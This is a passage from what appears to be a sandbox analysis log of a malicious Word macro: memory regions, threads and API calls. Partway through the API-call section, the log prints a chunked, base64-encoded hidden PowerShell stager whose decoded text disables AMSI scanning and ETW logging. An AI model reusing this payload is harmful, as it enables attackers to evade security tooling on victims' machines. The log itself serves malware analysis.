end_va = 0x1fe1679ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16790000" filename = "" Region: id = 645 start_va = 0x1fe1bde0000 end_va = 0x1fe1bec0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msword.olb" filename = "\\Program Files\\Microsoft Office\\Office16\\MSWORD.OLB" (normalized: "c:\\program files\\microsoft office\\office16\\msword.olb") Region: id = 646 start_va = 0x1fe1bed0000 end_va = 0x1fe1c150fff monitored = 1 entry_point = 0x1fe1bee4c98 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 647 start_va = 0x7fffd3150000 end_va = 0x7fffd33defff monitored = 1 entry_point = 0x7fffd3164c98 region_type = mapped_file name = "vbeui.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBEUI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbeui.dll") Region: id = 648 start_va = 0x1fe16790000 end_va = 0x1fe16791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16790000" filename = "" Region: id = 649 start_va = 0x7fffed7b0000 end_va = 0x7fffed804fff monitored = 0 entry_point = 0x7fffed7c7970 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 650 start_va = 0x1fe167d0000 end_va = 0x1fe167dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe167d0000" filename = "" Region: id = 651 start_va = 0x1fe1bed0000 end_va = 0x1fe1bef5fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "vbe7intl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\1033\\VBE7INTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\1033\\vbe7intl.dll") Region: id = 652 start_va = 0x1fe167f0000 end_va = 0x1fe167fafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "normnfd.nls" filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls") Region: id = 653 start_va = 0x1fe184a0000 end_va = 0x1fe184affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe184a0000" filename = "" Region: id = 654 start_va = 0x1fe184a0000 end_va = 0x1fe184a6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe184a0000" filename = "" Region: id = 655 start_va = 0x1fe1adf0000 end_va = 0x1fe1adf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1adf0000" filename = "" Region: id = 656 start_va = 0x1fe1bf00000 end_va = 0x1fe1bf3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf00000" filename = "" Region: id = 657 start_va = 0x1fe1bf40000 end_va = 0x1fe1bf42fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf40000" filename = "" Region: id = 658 start_va = 0x1fe1bf50000 end_va = 0x1fe1bf53fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf50000" filename = "" Region: id = 659 start_va = 0x1fe1bf60000 end_va = 0x1fe1bf60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf60000" filename = "" Region: id = 660 start_va = 0x1fe1bf70000 end_va = 0x1fe1bf70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf70000" filename = "" Region: id = 661 start_va = 0x1fe1bf80000 end_va = 0x1fe1bf80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf80000" filename = "" Region: id = 662 start_va = 0x1fe1bf90000 end_va = 0x1fe1bf97fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bf90000" filename = "" Region: id = 663 start_va = 0x1fe1bfa0000 end_va = 0x1fe1bfdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bfa0000" filename = "" Region: id = 664 start_va = 0x1fe1bfe0000 end_va = 0x1fe1bfe2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1bfe0000" filename = "" Region: id = 665 start_va = 0x1fe1bff0000 end_va = 0x1fe1c006fff monitored = 1 entry_point = 0x1fe1c1533cc region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 666 start_va = 0x1fe1c010000 end_va = 0x1fe1c014fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 667 start_va = 0x1fe1c020000 end_va = 0x1fe1c0a8fff monitored = 0 entry_point = 0x1fe1c02caf0 region_type = mapped_file name = "mso.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\MSO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\mso.dll") Region: id = 668 start_va = 0x1fe1c0b0000 end_va = 0x1fe1c0b3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c0b0000" filename = "" Region: id = 669 start_va = 0x1fe1c0c0000 end_va = 0x1fe1c0c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c0c0000" filename = "" Region: id = 670 start_va = 0x1fe1c0d0000 end_va = 0x1fe1c0d7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c0d0000" filename = "" Region: id = 671 start_va = 0x1fe1c0e0000 end_va = 0x1fe1c11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c0e0000" filename = "" Region: id = 672 start_va = 0x1fe1c120000 end_va = 0x1fe1c122fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c120000" filename = "" Region: id = 673 start_va = 0x1fe1c130000 end_va = 0x1fe1c137fff monitored = 1 entry_point = 0x1fe1c2933cc region_type = mapped_file name = "vbe7.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\VBA\\VBA7.1\\VBE7.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll") Region: id = 674 start_va = 0x5f80800000 end_va = 0x5f808fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80800000" filename = "" Region: id = 675 start_va = 0x1fe1c140000 end_va = 0x1fe1c143fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c140000" filename = "" Region: id = 676 start_va = 0x1fe1c150000 end_va = 0x1fe1c153fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c150000" filename = "" Region: id = 677 start_va = 0x1fe1c160000 end_va = 0x1fe1c163fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c160000" filename = "" Region: id = 678 start_va = 0x1fe1c170000 end_va = 0x1fe1c173fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c170000" filename = "" Region: id = 679 start_va = 0x7fffe5150000 end_va = 0x7fffe5178fff monitored = 0 entry_point = 0x7fffe5151340 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 680 start_va = 0x7fffe4ff0000 end_va = 0x7fffe500afff monitored = 0 entry_point = 0x7fffe4ff1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 681 start_va = 0x7fffe4ac0000 end_va = 0x7fffe4af4fff monitored = 0 entry_point = 0x7fffe4ac5850 region_type = mapped_file name = "scrrun.dll" filename = "\\Windows\\System32\\scrrun.dll" (normalized: "c:\\windows\\system32\\scrrun.dll") Region: id = 682 start_va = 0x1fe1c180000 end_va = 0x1fe1c192fff monitored = 0 entry_point = 0x1fe1c181340 region_type = mapped_file name = "wshom.ocx" filename = "\\Windows\\System32\\wshom.ocx" (normalized: "c:\\windows\\system32\\wshom.ocx") Region: id = 683 start_va = 0x5f80900000 end_va = 0x5f809fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000005f80900000" filename = "" Region: id = 684 start_va = 0x7fffeacf0000 end_va = 0x7fffeb182fff monitored = 0 entry_point = 0x7fffeacff760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 685 start_va = 0x1fe1c1a0000 end_va = 0x1fe1c1a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 698 start_va = 0x1fe1c1b0000 end_va = 0x1fe1c1d5fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "alrtintl.dll" filename = "\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\1033\\alrtintl.dll") Region: id = 699 start_va = 0x1fe1c1b0000 end_va = 0x1fe1c1f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe1c1b0000" filename = "" Region: id = 700 start_va = 0x1fe1c180000 end_va = 0x1fe1c18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c180000" filename = "" Region: id = 701 start_va = 0x1fe1c190000 end_va = 0x1fe1c19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c190000" filename = "" Region: id = 702 start_va = 0x1fe1c200000 end_va = 0x1fe1c20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c200000" filename = "" Region: id = 703 start_va = 0x1fe1c210000 end_va = 0x1fe1c21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c210000" filename = "" Region: id = 704 start_va = 0x1fe1c200000 end_va = 0x1fe1c20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c200000" filename = "" Region: id = 705 start_va = 0x1fe1c210000 end_va = 0x1fe1c21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c210000" filename = "" Region: id = 706 start_va = 0x1fe16720000 end_va = 0x1fe16720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16720000" filename = "" Region: id = 707 start_va = 0x1fe1c200000 end_va = 0x1fe1c231fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c200000" filename = "" Region: id = 708 start_va = 0x1fe1c240000 end_va = 0x1fe1c340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c240000" filename = "" Region: id = 709 start_va = 0x1fe1c240000 end_va = 0x1fe1c340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c240000" filename = "" Region: id = 710 start_va = 0x1fe16720000 end_va = 0x1fe16720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16720000" filename = "" Region: id = 711 start_va = 0x1fe1c240000 end_va = 0x1fe1c340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c240000" filename = "" Region: id = 712 start_va = 0x1fe1c240000 end_va = 0x1fe1c340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000001fe1c240000" filename = "" Region: id = 713 start_va = 0x1fe16720000 end_va = 0x1fe16720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16720000" filename = "" Region: id = 714 start_va = 0x1fe16720000 end_va = 0x1fe1672ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16720000" filename = "" Region: id = 715 start_va = 0x1fe16720000 end_va = 0x1fe16720fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe16720000" filename = "" Region: id = 716 start_va = 0x1fe14240000 end_va = 0x1fe1424ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14240000" filename = "" Region: id = 717 start_va = 0x1fe14240000 end_va = 0x1fe14240fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14240000" filename = "" Region: id = 718 start_va = 0x1fe1a3a0000 end_va = 0x1fe1a473fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "arialbd.ttf" filename = "\\Windows\\Fonts\\arialbd.ttf" (normalized: "c:\\windows\\fonts\\arialbd.ttf") Region: id = 719 start_va = 0x1fe14240000 end_va = 0x1fe1424ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14240000" filename = "" Region: id = 720 start_va = 0x1fe14240000 end_va = 0x1fe1424ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000001fe14240000" filename = "" Region: id = 863 start_va = 0x7fffec1d0000 end_va = 0x7fffec1dbfff monitored = 0 entry_point = 0x7fffec1d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 1 os_tid = 0x578 Thread: id = 2 os_tid = 0x13f8 Thread: id = 3 os_tid = 0x13f4 Thread: id = 4 os_tid = 0x13f0 Thread: id = 5 os_tid = 0x13e4 Thread: id = 6 os_tid = 0x13e0 Thread: id = 7 os_tid = 0x13d8 Thread: id = 8 os_tid = 0x13d4 Thread: id = 9 os_tid = 0x13d0 Thread: id = 10 os_tid = 0x13c8 Thread: id = 11 os_tid = 0x13c4 Thread: id = 12 os_tid = 0x13c0 Thread: id = 13 os_tid = 0x13bc Thread: id = 14 os_tid = 0x13b4 Thread: id = 15 os_tid = 0x13b0 [0175.781] DispCallFunc (pvInstance=0x1fe1aee2080, oVft=0xde0, cc=0x4, vtReturn=0xa, cActuals=0x0, prgvt=0x0, prgpvarg=0x0, pvargResult=0x5fff3662f0) returned 0x0 [0175.781] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x1000, lpStartAddress=0x7fffd8241498, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x5fff365d90 | out: lpThreadId=0x5fff365d90*=0x1c0) returned 0xe3c [0175.781] PeekMessageA (in: lpMsg=0x5fff365d30, hWnd=0x80208, wMsgFilterMin=0x1045, wMsgFilterMax=0x1045, wRemoveMsg=0x3 | out: lpMsg=0x5fff365d30) returned 0 [0175.781] GetActiveWindow () returned 0x802de [0175.782] CRetailMalloc_Alloc () returned 0x1fe14f23530 [0175.782] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fe1c140000 [0175.784] CRetailMalloc_Alloc () returned 0x1fe0ac15190 [0175.784] CRetailMalloc_GetSize () returned 0xc0 [0175.784] CRetailMalloc_Alloc () returned 0x1fe189216f0 [0175.784] CRetailMalloc_GetSize () returned 0x26d [0175.784] CRetailMalloc_GetSize () returned 0x26d [0175.784] GetCurrentProcess () returned 0xffffffffffffffff [0175.784] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe189216f0, dwSize=0x4c) returned 1 [0175.784] CRetailMalloc_Free () returned 0x1 [0175.784] CRetailMalloc_Alloc () returned 0x1fe1af9e390 [0175.784] memcpy (in: _Dst=0x1fe1af9e4a8, _Src=0x1fe1af9e3a8, _Size=0x0 | out: _Dst=0x1fe1af9e4a8) returned 0x1fe1af9e4a8 [0175.785] memcpy (in: _Dst=0x1fe1895f968, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895f968) returned 0x1fe1895f968 [0175.785] CRetailMalloc_Free () returned 0x1 [0175.785] GetCurrentProcess () returned 0xffffffffffffffff [0175.785] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f9, dwSize=0x8) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f8, dwSize=0x8) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f9, dwSize=0x8) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f7f8, dwSize=0x8) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f808, dwSize=0x2) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8f85c, dwSize=0x45) returned 1 [0175.786] VirtualProtect (in: lpAddress=0x1fe1af8f85c, dwSize=0x48, flNewProtect=0x40, lpflOldProtect=0x5fff3646ec | out: lpflOldProtect=0x5fff3646ec*=0x40) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d791, dwSize=0x8) returned 1 [0175.786] GetCurrentProcess () returned 0xffffffffffffffff [0175.786] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d790, dwSize=0x8) returned 1 [0175.787] GetCurrentProcess () returned 0xffffffffffffffff [0175.787] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d7a0, dwSize=0x2) returned 1 [0175.787] GetCurrentProcess () returned 0xffffffffffffffff [0175.787] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8d7f4, dwSize=0x4d) returned 1 [0175.787] VirtualProtect (in: lpAddress=0x1fe1af8d7f4, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x5fff3646ec | out: lpflOldProtect=0x5fff3646ec*=0x40) returned 1 [0175.787] GetCurrentProcess () returned 0xffffffffffffffff [0175.787] FlushInstructionCache (hProcess=0xffffffffffffffff, lpBaseAddress=0x1fe1af8e7dc, dwSize=0x4c) returned 1 [0175.787] RtlLookupFunctionEntry (in: ControlPc=0x1fe1af8e7dc, ImageBase=0x5fff3645d8, HistoryTable=0x5fff3645e0 | out: ImageBase=0x5fff3645d8, HistoryTable=0x5fff3645e0) returned 0x0 [0175.787] VirtualProtect (in: lpAddress=0x1fe1af8e7dc, dwSize=0x50, flNewProtect=0x40, lpflOldProtect=0x5fff3646dc | out: lpflOldProtect=0x5fff3646dc*=0x4) returned 1 [0175.788] RtlAddFunctionTable (FunctionTable=0x1fe1af8e838, EntryCount=0x1, BaseAddress=0x1fe1af8e700, TargetGp=0x40) returned 1 [0175.789] CRetailMalloc_Alloc () returned 0x1fe14f24650 [0175.789] memcpy (in: _Dst=0x1fe1895fa20, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895fa20) returned 0x1fe1895fa20 [0175.789] memcpy (in: _Dst=0x1fe1895fa38, _Src=0x7fffd860a8f8, _Size=0x18 | out: _Dst=0x1fe1895fa38) returned 0x1fe1895fa38 [0175.789] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg'", cbMultiByte=50, lpWideCharStr=0x1fe1c1401ec, cchWideChar=102 | out: lpWideCharStr="powershell -noP -sta -w 1 -enc SQBmACgAJABQAFMAVg") returned 50 [0175.790] realloc (_Block=0x0, _Size=0x200) returned 0x1fe1427b570 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1404ae, cchWideChar=102 | out: lpWideCharStr="BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp") returned 50 [0175.790] CRetailMalloc_Alloc () returned 0x1fe1af8d090 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1407d0, cchWideChar=102 | out: lpWideCharStr="AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABSAG") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c140af2, cchWideChar=102 | out: lpWideCharStr="UAZgA9AFsAUgBlAGYAXQAuAEEAcwBzAGUAbQBiAGwAeQAuAEcA") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c140e14, cchWideChar=102 | out: lpWideCharStr="ZQB0AFQAeQBwAGUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQ") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c141136, cchWideChar=102 | out: lpWideCharStr="BnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBB") returned 50 [0175.790] CRetailMalloc_Alloc () returned 0x1fe1af8c790 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c141458, cchWideChar=102 | out: lpWideCharStr="AG0AcwBpAFUAdABpAGwAcwAnACkAOwAkAFIAZQBmAC4ARwBlAH") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c14177a, cchWideChar=102 | out: lpWideCharStr="QARgBpAGUAbABkACgAJwBhAG0AcwBpAEkAbgBpAHQARgBhAGkA") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c141a9c, cchWideChar=102 | out: lpWideCharStr="bABlAGQAJwAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQ") returned 50 [0175.790] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c141dbe, cchWideChar=102 | out: lpWideCharStr="B0AGkAYwAnACkALgBTAGUAdAB2AGEAbAB1AGUAKAAkAE4AdQBs") returned 50 [0175.790] CRetailMalloc_Alloc () returned 0x1fe1af8e050 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1420e0, cchWideChar=102 | out: lpWideCharStr="AGwALAAkAHQAcgB1AGUAKQA7AFsAUwB5AHMAdABlAG0ALgBEAG") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="kAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c142402, cchWideChar=102 | out: lpWideCharStr="kAYQBnAG4AbwBzAHQAaQBjAHMALgBFAHYAZQBuAHQAaQBuAGcA") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="LgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c142724, cchWideChar=102 | out: lpWideCharStr="LgBFAHYAZQBuAHQAUAByAG8AdgBpAGQAZQByAF0ALgBHAGUAdA") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c142a46, cchWideChar=102 | out: lpWideCharStr="BGAGkAZQBsAGQAKAAnAG0AXwBlAG4AYQBiAGwAZQBkACcALAAn") returned 50 [0175.791] CRetailMalloc_Alloc () returned 0x1fe1af8e950 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c142d68, cchWideChar=102 | out: lpWideCharStr="AE4AbwBuAFAAdQBiAGwAaQBjACwASQBuAHMAdABhAG4AYwBlAC") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="cAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c14308a, cchWideChar=102 | out: lpWideCharStr="cAKQAuAFMAZQB0AFYAYQBsAHUAZQAoAFsAUgBlAGYAXQAuAEEA") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="cwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1433ac, cchWideChar=102 | out: lpWideCharStr="cwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAKAAnAFMAeQ") returned 50 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="BzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1436ce, cchWideChar=102 | out: lpWideCharStr="BzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0") returned 50 [0175.791] CRetailMalloc_Alloc () returned 0x1fe1af8d2d0 [0175.791] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1439f0, cchWideChar=102 | out: lpWideCharStr="AG8AbQBhAHQAaQBvAG4ALgBUAHIAYQBjAGkAbgBnAC4AUABTAE") returned 50 [0175.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="UAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c143d12, cchWideChar=102 | out: lpWideCharStr="UAdAB3AEwAbwBnAFAAcgBvAHYAaQBkAGUAcgAnACkALgBHAGUA") returned 50 [0175.792] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1fe1c150000 [0175.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="dABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c150064, cchWideChar=102 | out: lpWideCharStr="dABGAGkAZQBsAGQAKAAnAGUAdAB3AFAAcgBvAHYAaQBkAGUAcg") returned 50 [0175.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c150386, cchWideChar=102 | out: lpWideCharStr="AnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBj") returned 50 [0175.792] CRetailMalloc_Alloc () returned 0x1fe1af8d510 [0175.792] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1506a8, cchWideChar=102 | out: lpWideCharStr="ACcAKQAuAEcAZQB0AFYAYQBsAHUAZQAoACQAbgB1AGwAbAApAC") returned 50 [0175.793] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="wAMAApADsAfQA7AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMA\x0b", cbMultiByte=50, lpWideCharStr=0x1fe1c1509ca, 